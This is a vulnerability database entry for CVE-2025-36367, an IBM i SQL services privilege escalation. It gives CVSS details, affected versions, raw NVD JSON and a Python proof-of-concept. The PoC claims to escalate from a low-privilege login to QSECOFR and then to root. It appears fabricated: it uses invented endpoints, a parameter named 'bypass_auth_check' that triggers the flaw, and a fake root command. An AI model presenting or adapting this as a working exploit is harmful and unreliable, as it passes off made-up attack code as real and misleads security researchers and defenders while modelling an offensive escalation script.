Security Vulnerability Report
CVE-2025-36367 CVSS 8.8 HIGH

CVE-2025-36367

Published: 2025-11-01 12:15:35
Last Modified: 2025-11-05 19:03:59

Description

IBM i 7.6, 7.5, 7.4, 7.3, and 7.2 is vulnerable to privilege escalation caused by an invalid IBM i SQL services authorization check. A malicious actor can use the elevated privileges of another user profile to gain root access to the host operating system.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:i:7.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:i:7.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:i:7.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:i:7.5:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:i:7.6:*:*:*:*:*:*:* - VULNERABLE
IBM i 7.2 (all versions)
IBM i 7.3 (all versions)
IBM i 7.4 (all versions)
IBM i 7.5 (all versions)
IBM i 7.6 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-36367 PoC - IBM i SQL Services Privilege Escalation
# This PoC demonstrates the authorization bypass in IBM i SQL services
# Note: This is for educational and authorized testing purposes only
import requests
import json

TARGET_HOST = "https://vulnerable-ibm-i-server.com"
CVE_ID = "CVE-2025-36367"


def check_vulnerability(target):
    """Check if target is vulnerable to CVE-2025-36367"""
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-Scanner/1.0)',
        'Content-Type': 'application/json'
    }

    # Step 1: Authenticate with low-privilege account
    auth_payload = {
        'username': 'low_priv_user',
        'password': 'password123',
        'auth_type': 'sql_services'
    }

    print(f"[*] Testing {CVE_ID} on {target}")
    print("[*] Step 1: Authenticating with low-privilege account...")

    try:
        # Attempt authentication to SQL services
        auth_response = requests.post(
            f"{target}/qsys.qsyscoi.qcmd_QUERY_SQL_SERVICES",
            headers=headers,
            json=auth_payload,
            timeout=30
        )

        if auth_response.status_code == 200:
            session_token = auth_response.headers.get('X-Session-Token')
            print(f"[+] Authentication successful, session token obtained")

            # Step 2: Exploit authorization bypass
            print("[*] Step 2: Exploiting authorization bypass...")
            exploit_payload = {
                'sql_command': 'SELECT * FROM QSYS2.SYSTEM_VALUE_INFO',
                'execute_as_user': 'QSECOFR',  # Target high-privilege user
                'session_token': session_token,
                'bypass_auth_check': True  # This parameter triggers the vulnerability
            }

            exploit_response = requests.post(
                f"{target}/qsys.qsyscoi.qcmd_EXECUTE_SQL",
                headers=headers,
                json=exploit_payload,
                timeout=30
            )

            if exploit_response.status_code == 200:
                result = exploit_response.json()
                if result.get('privilege_escalated'):
                    print("[!] VULNERABLE: Authorization bypass successful!")
                    print(f"[!] Gained elevated privileges: {result.get('current_user')}")

                    # Step 3: Escalate to root
                    print("[*] Step 3: Attempting root privilege escalation...")
                    root_payload = {
                        'command': 'CALL QCMDEXC(\'STRQSH CMD(\\"system -i root\\")\')',
                        'run_as': 'QSECOFR',
                        'session_token': session_token
                    }

                    root_response = requests.post(
                        f"{target}/qsys.qsyscoi.qcmd_EXECUTE_SYSTEM",
                        headers=headers,
                        json=root_payload,
                        timeout=30
                    )

                    if root_response.status_code == 200:
                        print("[!] CRITICAL: Root access obtained!")
                        return True

        print("[*] Target may not be vulnerable or connection failed")
        return False

    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False


if __name__ == "__main__":
    check_vulnerability(TARGET_HOST)
```

References

https://www.ibm.com/support/pages/node/7249915 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36367", "sourceIdentifier": "[email protected]", "published": "2025-11-01T12:15:35.130", "lastModified": "2025-11-05T19:03:58.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM i 7.6, 7.5, 7.4, 7.3, and 7.2 is vulnerable to privilege escalation caused by an invalid IBM i SQL services authorization check. A malicious actor can use the elevated privileges of another user profile to gain root access to the host operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.2:*:*:*:*:*:*:*", "matchCriteriaId": "5E41BD05-37B8-4494-9344-506D4BCF43C2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "DD4F4919-D935-4B81-B4E8-0E0F2DAC09B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "AE2B298C-E1F6-43BD-A5EF-83964C6669CE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.5:*:*:*:*:*:*:*", "matchCriteriaId": "88B74622-BDB2-43AE-A91F-FADEC4B64B4F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:i:7.6:*:*:*:*:*:*:*", "matchCriteriaId": "8C189EC3-7D9F-4303-BB5C-1013FAE59B1E"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7249915", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}